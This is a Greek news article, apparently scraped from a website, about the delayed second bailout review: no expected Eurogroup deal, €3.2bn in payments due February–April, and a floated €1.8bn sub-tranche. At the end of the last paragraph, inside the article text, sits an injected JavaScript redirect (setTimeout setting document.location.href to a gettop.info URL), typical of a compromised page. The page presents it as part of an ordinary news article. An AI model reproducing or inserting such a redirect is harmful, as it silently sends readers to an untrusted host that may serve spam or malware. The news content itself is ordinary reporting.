Σήριαλ η β’ αξιολόγηση- Άνοιξη και βλέπουμε το κλείσιμο

0
15

 

Ετοιμασίες για πολιτική διαπραγμάτευση και παράταση της εκκρεμότητας για την οικονομία κάνουν ξανά στην κυβέρνηση, καθώς πηγές του Μεγάρου Μαξίμου επιβεβαιώνουν στο Βήμα της Κυριακής τις πληροφορίες ότι δεν αναμένεται συμφωνία στο προσεχές Eurogroup (26 Ιανουαρίου).

Εξάλλου και στη χθεσινή δήλωσή της η εκπρόσωπος της Κομισιόν δεν έδωσε συγκεκριμένη ημερομηνία επιστροφής των θεσμών στην Αθήνα, προσθέτοντας ότι στόχος παραμένει το κλείσιμο της β’ αξιολόγησης, αν και «αυτό δεν εξαρτάται μόνο από εμάς».

Όπως αναφέρει Το Βήμα, στο τρίμηνο Φεβρουαρίου – Απριλίου η χώρα θα πρέπει να αποπληρώσει υποχρεώσεις στο εξωτερικό ύψους 3,2 δισ. ευρώ. Αν δεν εισρεύσει το ποσό της νέας δόσης από την ολοκλήρωση της αξιολόγησης, τότε το Γενικό Λογιστήριο του Κράτους θα αναγκαστεί να επιστρέψει σε πρακτικές του 2015 ξύνοντας τον πάτο του βαρελιού από τα διαθέσιμα της γενικής κυβέρνησης και παγώνοντας τη ροή αποπληρωμής των ληξιπρόθεσμων χρεών του Δημοσίου.

Ως αντιστάθμισμα στις ανησυχίες, το οικονομικό επιτελείο κυκλοφόρησε μέσω κύκλων ένα σενάριο για καταβολή υποδόσης 1,8 δισ. ευρώ, αποκλειστικά για αποπληρωμή ληξιπρόθεσμων χρεών, στο τέλος Μαρτίου, ακόμη κι αν δεν έχει κλείσει η αξιολόγηση.

«Φρούδες ελπίδες» είναι η απάντηση που δίνουν παράγοντες των θεσμών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here